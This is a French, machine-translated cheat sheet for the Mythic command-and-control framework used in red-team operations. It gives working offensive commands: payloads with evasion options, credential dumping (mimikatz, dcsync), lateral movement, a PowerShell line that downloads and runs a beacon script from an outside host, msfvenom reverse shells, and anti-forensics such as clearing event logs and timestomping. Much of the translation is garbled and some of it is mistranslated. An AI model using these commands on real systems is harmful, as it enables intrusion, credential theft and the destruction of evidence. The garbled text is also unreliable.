Feuille de châtaignier Mythique C2
Aperçu général
Mythic est un cadre moderne de commande et de contrôle multiplateforme (C2) conçu pour les opérations de l'équipe rouge et l'émulation adverse. Construit avec une architecture conteneurisée utilisant Docker, Mythic fournit une interface web collaborative, prend en charge plusieurs types de charge utile, et offre une grande personnalisation par son architecture basée sur les agents avec support pour plusieurs langages de programmation.
C'est pas vrai. Attention : Cet outil est destiné aux tests de pénétration autorisés et aux exercices d'équipe rouge seulement. Assurez-vous d'avoir une autorisation appropriée avant d'utiliser contre toute cible.
Installation
Préalables
# Install Docker and Docker Compose
curl -fsSL https://get.docker.com -o get-docker.sh
sudo sh get-docker.sh
sudo usermod -aG docker $USER
# Install Docker Compose
sudo curl -L "https://github.com/docker/compose/releases/download/v2.20.0/docker-compose-$(uname -s)-$(uname -m)" -o /usr/local/bin/docker-compose
sudo chmod +x /usr/local/bin/docker-compose
# Verify installation
docker --version
docker-compose --version
Installation mythique
# Clone Mythic repository
git clone https://github.com/its-a-feature/Mythic.git
cd Mythic
# Make install script executable
chmod +x mythic-cli
# Install Mythic
sudo ./mythic-cli install
# Start Mythic services
sudo ./mythic-cli start
# Check status
sudo ./mythic-cli status
```_
### Configuration rapide
```bash
# One-liner installation
curl -sSL https://raw.githubusercontent.com/its-a-feature/Mythic/master/install.sh|bash
# Access web interface
# Navigate to https://localhost:7443
# Default credentials will be displayed during installation
```_
### Configuration manuelle Docker
```bash
# Clone repository
git clone https://github.com/its-a-feature/Mythic.git
cd Mythic
# Build containers
docker-compose build
# Start services
docker-compose up -d
# View logs
docker-compose logs -f mythic_server
Configuration de base
Configuration initiale
# First-time configuration
1. Navigate to https://localhost:7443
2. Login with generated credentials
3. Complete initial setup wizard
4. Configure global settings
# Change default passwords
sudo ./mythic-cli config set MYTHIC_ADMIN_PASSWORD newpassword
sudo ./mythic-cli config set MYTHIC_SERVER_BIND_LOCALHOST_ONLY false
# Restart services
sudo ./mythic-cli restart
Configuration SSL
# Generate SSL certificates
sudo ./mythic-cli config set MYTHIC_SERVER_CERT_PATH /path/to/cert.pem
sudo ./mythic-cli config set MYTHIC_SERVER_KEY_PATH /path/to/key.pem
# Use Let's Encrypt
certbot certonly --standalone -d your-domain.com
sudo ./mythic-cli config set MYTHIC_SERVER_CERT_PATH /etc/letsencrypt/live/your-domain.com/fullchain.pem
sudo ./mythic-cli config set MYTHIC_SERVER_KEY_PATH /etc/letsencrypt/live/your-domain.com/privkey.pem
# Restart with new certificates
sudo ./mythic-cli restart
Installation de l'agent
# Install popular agents
sudo ./mythic-cli install github https://github.com/MythicAgents/apfell.git
sudo ./mythic-cli install github https://github.com/MythicAgents/poseidon.git
sudo ./mythic-cli install github https://github.com/MythicAgents/apollo.git
sudo ./mythic-cli install github https://github.com/MythicAgents/merlin.git
# List available agents
sudo ./mythic-cli list
# Start specific agent
sudo ./mythic-cli start apfell
Navigation de l'interface Web
Tableau de bord
| Section | Description |
|---|---|
| Operations | Manage operations and campaigns |
| Payloads | Create and manage payload configurations |
| Callbacks | Active agent connections |
| Tasks | Command execution and task management |
| Files | File management and downloads |
| Credentials | Harvested credentials database |
| Artifacts | IOCs and forensic artifacts |
| Reporting | Generate operation reports |
Gestion des opérations
# Create new operation
1. Navigate to Operations → Create
2. Configure operation parameters:
- Name: Red Team Exercise 2024
- Description: Authorized penetration test
- Admin: [Your username]
- Complete: false
# Operation settings
- Webhook URL: [Slack/Teams integration]
- OPSEC: Enable/disable certain commands
- Logging: Configure audit logging
Création de charge utile
Apfell (macOS/Linux) Charge utile
# Create Apfell payload
1. Navigate to Payloads → Create
2. Select Apfell agent
3. Configure parameters:
- Payload Type: apfell
- C2 Profile: HTTP
- Callback Host: [Your IP/Domain]
- Callback Port: 80
- Callback Interval: 10
- Jitter: 23
# Build options
- Output Format: bash, zsh, osascript, dylib
- Architecture: x64, arm64
- Obfuscation: Enable string obfuscation
Poséidon (plateforme) Charge utile
# Create Poseidon payload
1. Navigate to Payloads → Create
2. Select Poseidon agent
3. Configure parameters:
- Payload Type: poseidon
- C2 Profile: HTTP
- Callback Host: [Your IP/Domain]
- Callback Port: 443
- User Agent: Mozilla/5.0...
- Sleep: 5
- Jitter: 10
# Advanced options
- Proxy: Configure proxy settings
- Headers: Custom HTTP headers
- Encryption: AES encryption key
Apollo (Windows) Charge utile
# Create Apollo payload
1. Navigate to Payloads → Create
2. Select Apollo agent
3. Configure parameters:
- Payload Type: apollo
- C2 Profile: HTTP
- Architecture: x64, x86
- Format: exe, dll, shellcode
- Callback Host: [Your IP/Domain]
- Callback Port: 8080
# Windows-specific options
- PPID Spoofing: Enable parent process spoofing
- Block DLLs: Block non-Microsoft DLLs
- ETW Bypass: Enable ETW evasion
Profils C2
HTTP Configuration du profil
\\\\{
"name": "HTTP Profile",
"description": "Standard HTTP communication",
"parameters": \\\\{
"callback_host": "192.168.1.100",
"callback_port": 80,
"killdate": "2024-12-31",
"encrypted_exchange_check": true,
"callback_jitter": 23,
"callback_interval": 10,
"get_uri": "/api/v1/status",
"post_uri": "/api/v1/data",
"query_path_name": "q",
"proxy_host": "",
"proxy_port": "",
"proxy_user": "",
"proxy_pass": ""
\\\\}
\\\\}
Configuration du profil HTTPS
\\\\{
"name": "HTTPS Profile",
"description": "Encrypted HTTPS communication",
"parameters": \\\\{
"callback_host": "secure.example.com",
"callback_port": 443,
"callback_interval": 30,
"callback_jitter": 15,
"encrypted_exchange_check": true,
"ssl_cert_path": "/path/to/cert.pem",
"ssl_key_path": "/path/to/key.pem",
"headers": [
\\\\{
"name": "User-Agent",
"value": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
\\\\}
]
\\\\}
\\\\}
Profil WebSocket
\\\\{
"name": "WebSocket Profile",
"description": "WebSocket-based communication",
"parameters": \\\\{
"callback_host": "ws.example.com",
"callback_port": 8080,
"endpoint": "/ws",
"user_agent": "Mozilla/5.0...",
"heartbeat_interval": 30
\\\\}
\\\\}
Gestion des agents
Interaction de rappel
# Basic callback commands
help # Show available commands
whoami # Get current user
pwd # Current directory
ls # List directory contents
cd [path] # Change directory
cat [file] # Read file
download [file] # Download file
upload [local] [remote] # Upload file
shell [command] # Execute shell command
Gestion des processus
# Process operations
ps # List processes
kill [pid] # Kill process
jobs # List background jobs
jobkill [jid] # Kill background job
# Process injection (Apollo)
inject [pid] [shellcode] # Inject shellcode
shinject [pid] [file] # Inject shellcode from file
dllload [dll] # Load DLL
Opérations liées aux titres de créance
# Credential harvesting
mimikatz [command] # Execute Mimikatz
logonpasswords # Dump logon passwords
lsadump # Dump LSA secrets
dcsync [user] # DCSync attack
# Token manipulation
steal_token [pid] # Steal process token
make_token [user] [pass] # Create token
rev2self # Revert to self
Mouvement latéral
# Remote execution
psexec [target] [command] # PSExec execution
wmiexec [target] [command] # WMI execution
smbexec [target] [command] # SMB execution
# PowerShell remoting
invoke_command [target] [command] # PowerShell remoting
enter_pssession [target] # Interactive PS session
# SSH (Poseidon)
ssh [target] [user] [key] # SSH connection
scp [source] [dest] # Secure copy
Caractéristiques avancées
SOCKS Proxy
# Start SOCKS proxy
socks [port] # Start SOCKS4/5 proxy
socks_list # List active proxies
socks_kill [id] # Kill SOCKS proxy
# Use with external tools
proxychains -f /etc/proxychains.conf nmap -sT 192.168.1.0/24
Transfert de port
# Local port forwarding
portfwd [local_port] [remote_host] [remote_port]
# Reverse port forwarding
rportfwd [remote_port] [local_host] [local_port]
# List active forwards
portfwd_list
# Kill port forward
portfwd_kill [id]
Opérations de fichiers
# File management
mkdir [directory] # Create directory
rm [file] # Remove file
mv [source] [dest] # Move file
cp [source] [dest] # Copy file
chmod [mode] [file] # Change permissions
# Archive operations
zip [archive] [files] # Create zip archive
unzip [archive] # Extract archive
tar [options] [archive] # Tar operations
Découverte du réseau
# Network reconnaissance
portscan [target] [ports] # Port scanning
ping [target] # ICMP ping
traceroute [target] # Trace route
arp # ARP table
netstat # Network connections
ifconfig # Network interfaces
Automatisation et écriture
Automatisation des tâches
# Python automation script
import asyncio
import mythic
async def automated_recon(callback_id):
"""Automated reconnaissance on new callback"""
# Basic system information
tasks = [
"whoami",
"hostname",
"pwd",
"ps",
"ifconfig",
"netstat -an"
]
for task in tasks:
await mythic.issue_task(callback_id, task)
await asyncio.sleep(2)
# Credential harvesting if elevated
if await mythic.is_elevated(callback_id):
await mythic.issue_task(callback_id, "mimikatz logonpasswords")
await mythic.issue_task(callback_id, "lsadump")
# Register automation
mythic.register_callback_automation(automated_recon)
Intégration de Webhook
# Slack webhook integration
import requests
import json
def send_slack_notification(callback_info):
"""Send Slack notification for new callbacks"""
webhook_url = "https://hooks.slack.com/services/YOUR/WEBHOOK/URL"
message = \\\\{
"text": f"New Mythic Callback",
"attachments": [
\\\\{
"color": "good",
"fields": [
\\\\{"title": "Host", "value": callback_info['host'], "short": True\\\\},
\\\\{"title": "User", "value": callback_info['user'], "short": True\\\\},
\\\\{"title": "Agent", "value": callback_info['agent'], "short": True\\\\},
\\\\{"title": "IP", "value": callback_info['ip'], "short": True\\\\}
]
\\\\}
]
\\\\}
requests.post(webhook_url, data=json.dumps(message),
headers=\\\\{'Content-Type': 'application/json'\\\\})
# Configure webhook in Mythic
mythic.set_webhook_callback(send_slack_notification)
Opérations par lots
#!/bin/bash
# Batch callback management script
MYTHIC_URL="https://localhost:7443"
API_TOKEN="your_api_token"
# Function to execute command on all callbacks
execute_on_all() \\\\{
local command=$1
# Get all active callbacks
callbacks=$(curl -s -k -H "Authorization: Bearer $API_TOKEN" \
"$MYTHIC_URL/api/v1.4/callbacks"|jq -r '.callbacks[].id')
for callback_id in $callbacks; do
echo "[+] Executing '$command' on callback $callback_id"
curl -s -k -X POST \
-H "Authorization: Bearer $API_TOKEN" \
-H "Content-Type: application/json" \
-d "\\\\{\"command\": \"$command\"\\\\}" \
"$MYTHIC_URL/api/v1.4/callbacks/$callback_id/tasks"
sleep 1
done
\\\\}
# Usage examples
execute_on_all "whoami"
execute_on_all "ps"
execute_on_all "netstat -an"
Agents personnalisés
Structure de développement des agents
# Custom agent template
from mythic_payloadtype_container.MythicCommandBase import *
from mythic_payloadtype_container.MythicRPC import *
class CustomAgent(PayloadType):
name = "custom_agent"
file_extension = "py"
author = "@your_handle"
supported_os = [SupportedOS.Windows, SupportedOS.Linux, SupportedOS.MacOS]
wrapper = False
wrapped_payloads = []
note = "Custom Python-based agent"
supports_dynamic_loading = True
async def build(self) -> BuildResponse:
# Build logic here
resp = BuildResponse(status=BuildStatus.Success)
return resp
# Command implementation
class WhoAmI(CommandBase):
cmd = "whoami"
needs_admin = False
help_cmd = "Get current user information"
description = "Execute whoami command"
version = 1
author = "@your_handle"
async def create_tasking(self, task: MythicTask) -> MythicTask:
task.display_params = "whoami"
return task
async def process_response(self, response: AgentResponse):
pass
Agent Communication
// Go agent communication example
package main
import (
"bytes"
"crypto/tls"
"encoding/json"
"net/http"
"time"
)
type Agent struct \\\\{
ID string
Host string
Port int
Interval time.Duration
Jitter int
\\\\}
func (a *Agent) Checkin() error \\\\{
checkinData := map[string]interface\\\\{\\\\}\\\\{
"action": "checkin",
"uuid": a.ID,
"ips": getLocalIPs(),
"os": getOSInfo(),
"user": getCurrentUser(),
"host": getHostname(),
"pid": getPID(),
"ppid": getPPID(),
\\\\}
jsonData, _ := json.Marshal(checkinData)
tr := &http.Transport\\\\{
TLSClientConfig: &tls.Config\\\\{InsecureSkipVerify: true\\\\},
\\\\}
client := &http.Client\\\\{Transport: tr\\\\}
resp, err := client.Post(
fmt.Sprintf("https://%s:%d/api/v1.4/agent_message", a.Host, a.Port),
"application/json",
bytes.NewBuffer(jsonData),
)
if err != nil \\\\{
return err
\\\\}
defer resp.Body.Close()
return nil
\\\\}
func (a *Agent) GetTasks() ([]Task, error) \\\\{
// Implementation for getting tasks
return nil, nil
\\\\}
func (a *Agent) SendResponse(taskID string, response string) error \\\\{
// Implementation for sending task responses
return nil
\\\\}
Intégration avec d'autres outils
Intégration des métadonnées
# Use Mythic with Metasploit
# Generate Metasploit payload
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.1.100 LPORT=8443 -f exe -o meterpreter.exe
# Upload via Mythic callback
upload meterpreter.exe /tmp/meterpreter.exe
# Execute Metasploit payload
shell /tmp/meterpreter.exe
# Handle in Metasploit
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_https
set LHOST 192.168.1.100
set LPORT 8443
run
Intégration de BloodHound
# Collect BloodHound data via Mythic
# Upload SharpHound
upload SharpHound.exe /tmp/sharphound.exe
# Run collection
shell /tmp/sharphound.exe -c All -d domain.local --zipfilename bloodhound.zip
# Download results
download /tmp/bloodhound.zip
# Import into BloodHound
neo4j start
./BloodHound --no-sandbox
Intégration de la grève du cobalt
# Beacon integration
# Generate Cobalt Strike beacon
# Use Mythic for initial access, pivot to Beacon
# From Mythic callback
shell powershell -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.100/beacon.ps1')"
# Handle in Cobalt Strike team server
Sécurité opérationnelle
Sécurité des communications
# Domain fronting configuration
# Configure CDN (CloudFlare, AWS CloudFront)
# Set up domain fronting rules
# Update C2 profile with fronted domain
# Certificate management
# Use legitimate SSL certificates
# Implement certificate pinning
# Rotate certificates regularly
Analyse du trafic Évasion
# Malleable profiles
# Mimic legitimate applications
# Use common user agents
# Implement realistic timing
# Example profile mimicking Office 365
\\\\{
"name": "Office365",
"user_agent": "Microsoft Office/16.0 (Windows NT 10.0; Microsoft Outlook 16.0.12026; Pro)",
"get_uri": "/owa/auth/logon.aspx",
"post_uri": "/owa/auth/owaauth.dll",
"headers": [
\\\\{"name": "Accept", "value": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"\\\\},
\\\\{"name": "Accept-Language", "value": "en-US,en;q=0.5"\\\\},
\\\\{"name": "Accept-Encoding", "value": "gzip, deflate"\\\\}
]
\\\\}
Anti-forensiques
# Event log clearing
shell wevtutil cl System
shell wevtutil cl Security
shell wevtutil cl Application
# Timestomping
shell powershell -c "$(Get-Item file.exe).LastWriteTime = '01/01/2020 12:00:00'"
# Memory cleanup
# Implement secure memory wiping
# Use process migration
# Clear command history
Dépannage
Questions communes
# Callback not connecting
1. Check firewall rules
2. Verify C2 profile configuration
3. Test network connectivity
4. Check DNS resolution
# SSL/TLS issues
# Regenerate certificates
sudo ./mythic-cli config set MYTHIC_SERVER_CERT_PATH /new/path/cert.pem
sudo ./mythic-cli restart
# Container issues
# Check Docker status
docker ps -a
docker logs mythic_server
# Restart services
sudo ./mythic-cli restart
Mode de débogage
# Enable debug logging
sudo ./mythic-cli config set MYTHIC_DEBUG_LEVEL DEBUG
sudo ./mythic-cli restart
# View logs
sudo ./mythic-cli logs
# Database issues
# Access PostgreSQL
docker exec -it mythic_postgres psql -U mythic_user -d mythic_db
# Reset database
sudo ./mythic-cli database reset
Optimisation des performances
# Optimize Docker resources
# Increase memory allocation
sudo ./mythic-cli config set MYTHIC_DOCKER_MEMORY 4g
# Optimize callback intervals
# Increase sleep time for stealth
# Reduce jitter for faster response
# Database optimization
# Regular database maintenance
# Index optimization
# Query performance tuning
Meilleures pratiques
Planification opérationnelle
- Configurer les profils et les agents avant l'engagement
- Coordination de l'équipe: Utiliser la gestion des opérations pour la collaboration d'équipe
- ** Protocoles de communication** : Établir des canaux de communication C2 clairs
- ** Traitement des données** : Mettre en œuvre une collecte et une infiltration de données sécurisées
- Procédures de nettoyage: Plan d'enlèvement des artefacts et de nettoyage opérationnel
Considérations en matière de sécurité
# Secure deployment
# Use strong authentication
# Enable HTTPS with valid certificates
# Implement network segmentation
# Regular security updates
# Agent management
# Use unique agent configurations
# Implement kill dates
# Regular agent rotation
# Secure communication channels
Documentation et rapports
# Operation documentation
# Maintain detailed logs
# Document all activities
# Track compromised systems
# Generate executive reports
# Artifact tracking
# Monitor IOCs
# Document forensic artifacts
# Implement attribution prevention
Ressources
- [Résistoire de GitHub Mythique] (LINK_5)
- Documentation Mythique
- [Répertoire des agents mythiques] (LINK_5)
- [Profils de la méthode C2] (LINK_5)
- Entraînement sur les mythes des villages de l'équipe rouge
*Cette feuille de triche fournit une référence complète pour l'utilisation du cadre Mythic C2. Assurez-vous toujours d'avoir une autorisation appropriée avant d'effectuer les opérations de l'équipe rouge ou les tests de pénétration. *